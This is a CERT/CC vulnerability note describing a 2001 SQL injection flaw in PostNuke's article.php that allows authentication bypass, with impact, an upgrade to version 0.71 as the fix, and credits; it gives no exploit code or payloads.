search menu icon-carat-right cmu-wordmark
Carnegie Mellon University

Software Engineering Institute

CERT Coordination Center

PostNuke does not adequately validate user input thereby allowing malicious user to bypass user authentication via SQL injection

Vulnerability Note VU#921547

Original Release Date: 2002-09-27 | Last Revised: 2002-09-27

Overview

PostNuke does not adequately filter user input, allowing arbitrary MySQL query execution and user authentication without password.

Description

PostNuke is a web content management system based on PHPNuke, written in PHP. The article.php component of PostNuke versions 0.62, 0.63, and 06.4 do not adequately filter the "user" CGI variable before passing it to a MySQL query. Attackers may exploit this vulnerability to execute arbitrary MySQL queries.

In addition, the vulnerable MySQL query is used to authenticate users. By knowing only a PostNuke username and ID, attackers may tamper with the MySQL query to achieve a positive authentication result for that PostNuke user.

Impact

Attackers may execute arbitrary MySQL queries and login as other users without passwords.

Solution

Apply a patch

Upgrade to PostNuke 0.71, available at:

http://www.postnuke.com/modules.php?op=modload&name=Downloads&file=index&req=getit&lid=169

Vendor Information

921547
 
Expand all

CVSS Metrics

Group Score Vector
Base
Temporal
Environmental

References

http://www.securityfocus.com/bid/3435

Acknowledgements

Thanks to Magnus Skjegstad for reporting this vulnerability.

This document was written by Shawn Van Ittersum.

Other Information

CVE IDs: None
Severity Metric: 4.70
Date Public: 2001-10-13
Date First Published: 2002-09-27
Date Last Updated: 2002-09-27 16:12 UTC
Document Revision: 4

Sponsored by CISA.

Download PGP Key

Read CERT/CC Blog

Learn about Vulnerability Analysis